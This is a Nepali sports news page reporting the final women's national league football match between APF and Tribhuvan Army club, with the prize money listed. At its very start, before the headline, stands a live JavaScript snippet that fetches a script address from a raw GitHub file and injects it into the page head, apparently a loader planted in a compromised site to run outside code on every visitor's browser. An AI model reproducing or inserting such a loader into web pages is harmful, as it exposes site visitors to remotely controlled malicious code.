;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); एपीएफ र त्रिभुवन आर्मी क्लबबीच अन्तिम खेल हुँदै – जुनेली न्युज
बिहिबार, बैशाख ५, २०८२
  • होमपेज
  • एपीएफ र त्रिभुवन आर्मी क्लबबीच अन्तिम खेल हुँदै
खेलकुद

एपीएफ र त्रिभुवन आर्मी क्लबबीच अन्तिम खेल हुँदै

फागुन ७,
काठमाण्डाै । राष्ट्रिय महिला लिग फुटबलमा आज अन्तिम खेल हुँदैछ ।

दिउँसो २ बजे दशरथ रङ्गशालामा एपीएफ र त्रिभुवन आर्मी फुटबल क्लबबीचको खेल हुँदै छ । एपीएफले लिगको उपाधि जितिसकेको छ भने आर्मी उपविजेता बनिसकेको छ ।

डबल राउण्ड रोबिनको आधारमा सुरु भएको खेलमा ७ समूह सहभागी भएका थिए । प्रतियोगिताको विजेताले १५ लाख रुपैयाँ, दोस्रोले ८ लाख रुपैयाँ, तेस्रोले ५ लाख रुपैयाँ र चौथो हुनेले ३ लाख रुपैयाँ पाउनेछन् ।

यस्तै प्रतियोगिताको सर्वोत्कृष्ट खेलाडीले एक थान स्कुटर र विधागत उत्कृष्ट खेलाडीले जनही ५० हजार रुपैयाँ पाउनेछन् ।

फेसबुक प्रतिक्रियाहरु